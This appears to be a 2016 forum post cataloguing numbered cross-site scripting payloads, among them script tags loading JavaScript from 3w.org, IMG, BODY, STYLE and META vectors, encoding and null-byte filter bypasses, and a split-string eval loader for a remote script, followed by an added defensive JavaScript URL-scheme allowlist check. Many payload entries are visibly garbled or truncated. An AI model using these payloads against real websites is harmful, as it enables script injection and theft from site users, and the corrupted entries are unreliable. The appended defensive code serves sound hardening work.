
XSS Attack Summary

Original poster | Posted on 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert boxes

<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript directive

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)

<IMG SRC=javascript:alert("XSS")>

(6) Defective IMG tag, corrected

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode tag (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)

<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)

<IMG SRC=\'#\'" /span>

(11) Embedded tag, splitting the JavaScript

<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tag, splitting the JavaScript

<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example

<IMG SRC=\'#\'" /span>
(16) Working around a character limit (must be on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically have no effect in China, because there is nowhere to make use of them

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters

<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3

<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC=\'#\'" /span>

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping filtered JavaScript

\";alert('XSS');//

(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image

<INPUT SRC=\'#\'" /span>

(32) BODY Image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY('XSS')>

(34) IMG Dynsrc

<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc

<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND

<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript

<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe

<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame

<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">
- B  P$ P" y" Q4 Y0 W
(49) STYLE attribute with split expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket and a leading letter)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method

exppression(alert("XSS"))'>

(53) STYLE background

<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a FLASH file that contains XSS

<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
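A defensive counterpart to the IMG SRC items (3)-(14), (17) and (19) above, added here as an example and not part of the original post: it canonicalises a src/href attribute value the way the HTML and URL parsers do (numeric entity decoding with or without semicolons, stripping of leading control characters, removal of embedded tab/LF/CR/NUL, case folding) and only then applies a scheme allowlist, so every spelling of `javascript:` in the list lands on the same check. All sample values are constructed for this example.

```javascript
// Added example (not part of the original post): a defensive check for
// src/href-style attribute values that canonicalises the way HTML and URL
// parsers do, so the IMG SRC variants in items (3)-(14), (17) and (19)
// all hit one scheme allowlist. Sample inputs below are constructed.

// Decode numeric character references, with or without the trailing
// semicolon, as the HTML parser does (items 5, 8, 9, 10).
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (m, ref) => {
    const cp = /^x/i.test(ref) ? parseInt(ref.slice(1), 16) : parseInt(ref, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}
// Lowercased scheme of an attribute value, or null for a relative URL.
// Leading/trailing C0 controls and spaces are stripped and embedded
// tab/LF/CR/NUL removed (items 4, 11-14, 17, 19).
function canonicalScheme(value) {
  const decoded = decodeNumericEntities(value)
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '')
    .replace(/[\t\n\r\0]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(decoded);
  return m ? m[1].toLowerCase() : null;
}
// Allowlist, never a denylist of "javascript:" spellings. A named entity
// left undecoded (e.g. &colon;) makes the check fail closed.
const ALLOWED_SCHEMES = new Set(['http', 'https']);
function isSafeUrl(value) {
  if (/&[a-z]+;/i.test(decodeNumericEntities(value))) return false;
  const scheme = canonicalScheme(value);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}
// Constructed variants mirroring the post's items, with expected verdicts.
const SAMPLES = [
  ["javascript:alert('XSS')", false],               // (3)
  ["JaVaScRiPt:alert('XSS')", false],               // (4)
  ['&#106;&#97;&#118;&#97;script:alert(1)', false], // (5) decimal refs
  ['&#x6A&#x61&#x76&#x61script:alert(1)', false],   // (10) hex, no semicolons
  ['jav\tascript:alert(1)', false],                 // (11) embedded tab
  ['jav&#x0A;ascript:alert(1)', false],             // (13) encoded newline
  ['java\0script:alert(1)', false],                 // (17) null byte
  [' &#14;  javascript:alert(1)', false],           // (19) spaces, meta char
  ['vbscript:msgbox(1)', false],                    // (40) other scheme
  ['http://example.com/a.png', true],
  ['/images/logo.png', true],
];
// Samples whose verdict disagrees with the expectation; empty means all pass.
function mismatches() {
  return SAMPLES.filter(([v, ok]) => isSafeUrl(v) !== ok).map(([v]) => v);
}
```

The fail-closed rule on undecoded named entities also rejects legitimate values such as `&amp;` inside a query string, so decode those too (or entity-decode once, server side, before this check) if the attribute must carry them.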
